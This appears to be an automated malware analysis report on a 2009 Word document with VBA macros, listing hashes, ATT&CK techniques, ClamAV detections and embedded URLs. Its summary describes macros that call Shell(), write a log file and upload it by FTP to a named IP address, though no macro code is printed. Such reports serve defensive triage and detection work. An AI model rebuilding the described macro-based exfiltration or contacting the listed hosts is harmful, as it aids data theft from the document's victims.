Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 09f55d41686220a0…

MALICIOUS

Office (OLE)

90.0 KB Created: 2009-08-30 20:40:00 Authoring application: Microsoft Word 11.5.3
MD5: dffd21c000acb9a86d63314ddebb1a3a SHA-1: b7a94d2776e0222f0d3ace456c6bdc0c458a1052 SHA-256: 09f55d41686220a0492a2b214c0a2094690831318623134920c969a1c0a593f2
210 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros that execute a Shell() command, indicating a malicious intent to download and run additional content. The script attempts to write a log file to 'C:\hsf*.sys' and then uses FTP commands to upload it to '209.201.88.110'. The embedded URLs are likely related to the payload delivery or C2 communication. The ClamAV detections further support the malicious nature of the file.

Heuristics 6

  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • ClamAV: Doc.Trojan.Marker-31 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-31
  • ClamAV detection on extracted artifact critical EXTRACTED_FILE_CLAMAV
    ClamAV flagged at least one file extracted from inside this sample. Even when the wrapping document carries no AV detection of its own, a hit on the carved artifact is a strong indicator the sample is a delivery vehicle.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code
  • Urgency / deadline lure low SE_URGENCY_LURE
    Document contains urgency or deadline language ('account will be terminated', 'action required within 24 hours', etc.) — useful context, but low-signal without other findings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.ca-hss.com
    • http://www.onlineintervention.com
    • http://www.stjoachimschool.org

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
f9f57e870c2815c497a3874f94feb52dee3c2cb50e8653e0eef3a472f54e7488		 vba-macro oletools.olevba.extract_macros (decoded VBA source) 6896 bytes
Detection
ClamAV: Doc.Trojan.Marker-3
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.